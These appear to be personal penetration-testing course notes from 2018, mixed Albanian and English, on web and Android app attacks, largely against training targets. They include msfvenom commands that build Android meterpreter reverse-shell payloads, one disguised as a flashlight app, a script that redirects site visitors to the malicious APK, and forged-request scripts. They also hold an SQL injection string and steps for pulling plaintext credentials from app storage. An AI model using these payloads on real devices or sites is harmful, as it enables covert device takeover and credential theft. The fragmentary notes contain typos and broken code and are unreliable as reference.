temper data, burb suite
  
  md5sum filename
  
  captach bohet bypass tu mos e shkru captaca
  captacha e rujtje ne cookies
  e validon nje captcha manedj e perdor cdo her te njejten captch ne qat session
  captacha gjendet se eshte tu u perserit
  
  == threats te nje kompanie pharmaceutic ==
  -goverment/rules
  -criminal organizations
  -competition
  -chinese apt
  -treg jo lojal
  -black mails
  -insiders threats
  
  mobile front: xml
  mobile api: android, iOS, balackbarry,
  logging: elk stack,splunk, qradar, gfi, solarwinds
  databases: MS sql, my sql, oracle, db2 etj
  backend: php, asp, python etj
  midleware
  front end
  
  == threat actors te rasi i nje news media==
  politika
  konkurrenca
  black hats
  
  availability
  reputation
  market sharing
===========================================================================
  REMEDIATION
  
  Insecure Direct Object Reference (IDOR)
  172.16.60.85
  172.16.60.88
  
  
    Download Nessus from here. Choose the Ubuntu packages (or the Debian ones)
    Open a Terminal and go to the download directory (cd)
    Run sudo dpkg -i Nessus*.deb. Enter root password.
    Start it sudo /etc/init.d/nessusd start
    Open a browser and go to https://localhost:8834/
  
  
===========================================================================
  17.10.2018
  
  Broken Authentication
  Password recovery function
      modify email ku shkon opt me email ku kemi qasje
  email hap
    kerkon me hap mail te re
      e krijon nje mail 
      e zevendeson me email e krijuar
        e intercept e shtin email e re
        funksioni e gjet mail qel
        e qon confirmimin mi kallxu ku me qu konfirmimin
        kete konfirmim e modifikon me mail te re edhe konfirmimi shkon ne mail te re
        cdo mail ne facebook database eshte nje uique ID e re
        kjo punon vetem me mails te reja
        
        
        sql injection
        
  sensitive data export
  
  bypass cludeflare
  tu provu mi gjet subdomain
  tu gjet misconfiguration
  tu e kqyr historin e domains (qysh e ka pas para se me hi ne cludeflare) rekomandohet me ndrru IP para se me hi CF
  bruteforce sub-domains,rekomandohet me hi krejt subdomains
  full path ne url, tregon qa mun me hack ne qat server
  XML and XXE attack
  
  
  bypass WAF
  check for encoders
  check for sql inj " 
  for symbols '
  
  Security Misconfiguration
      NAT all port nat to one port
      SSH open
      admin page open to external
      device console unprotected
      
===========================================================================
  19.10.2018
  munges
===========================================================================
  22.10.2018 
  
  msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.65.141 LPORT=9999 R> king2.apk
  
  e index.html inserto
  <script>
  window.location.assign("update.apk");

  test with android by uploading a malware in android and meterpreter to manage the session
  kur ta viziton faqen dikush me te dal redirected update.apk
  mitmf ???
===========================================================================
  24.10.2018
  munges      
===========================================================================
  26.10.2018
  msfvenom -x flashlight.apk -p android/meterpreter/reverse_tcp LHOST=172.16.60.69 LPORT=9559 R> flash-light.apk

===========================================================================
  29.10.2018
  
  import request
  payload = {"username":"jack","password":"P@ssw0rd","from_acc":"5555555","to_acc":"999999",""amount,"10"}
  r = request.post("http://127.0.0.1:8888/dotransfer", data=payload)
  print r.text
    
  python sendMN.py
  
  ### test if we can view account state
  /getaccounts
  
  nano getA.py
  
  import request
  payload = {"username":"dinesh","password":"P@ssw0rd"}
  r = request.post("http://127.0.0.1:8888/getaccounts", data=payload)
  print r.text
  
  me burb e validojm changepassword requestin
  intersept requestin kur e ke ndrru passwordin
   
  nano changPassowrd.py
  import request
  payload = {"username":"jack", "newpassword":"Password"}
  r= request.post("https://127.0.0.1:8888/changepassword", data=payload)
  print r.text
  
  
  adb shell
  adb pull
  adb push
  pm list package
  am start -n
  
  am start -n com.android.insecurebankv2/.Postlogin 
  am start -n jakhar.aseem.diva
  apktool -d emri
===========================================================================
  31.10.2018
  
  me zgjedh nej .. 
  me exploit
  me dokumentu
  

  ## insecure logging
  ##checkout tu e shkru cc number edhe shiko a pe sheh cc number me command me posht
  # adb logcat | grep credit
  ## nese e sheh plain text cc number kjo i bjen qe eshte vul.
  
  
  apltool d diva.apk -o diva-extarcted
  ne extracted folder #cat HardcodeActivity.smali
  
  3.
  adb shell # be sure OS is rooted
  3.insecure data storage - part1 
  create user/pass
  su - to get root access
  cd /data/data/jahkar/aseem.diva/shared_prefs
  ls
  cat *.xml
  :) you will see user and pass plain text
  
  4.
  adb shell
  create user/pass
  cd /data/data/jahkar/aseem.diva/
  ls then cd databases
  ids2 chosen
  adb pool /data/data/jahkar/aseem.diva/databases/ids2
  file ids2 ##s1llite3 is found
  sqlite3 ids2
  .tables
  select * from myuser;
  
  5.
  adb shell
  create user/pass
  cd /data/data/jahkar/aseem.diva/
  when user is created a file named uinfo23423j2tmp
  cat uinfo23423j2tmp
  :) you will see user/pass created on app
  
  6.
  adb shell
  grant storage access for diva app
  create user/pass
  cd /mnt/sdcard
  cat .uinfo.txt
  :) you will see user/pass created on app
  
  7.
  search 1'or'1'='1 
  this will query for all users in database
  
  8.
  view an url ex: https://www.google.com
  than you will be able to view or move through directories
  ex file:// or file://etc/filename
  file:///etc/hosts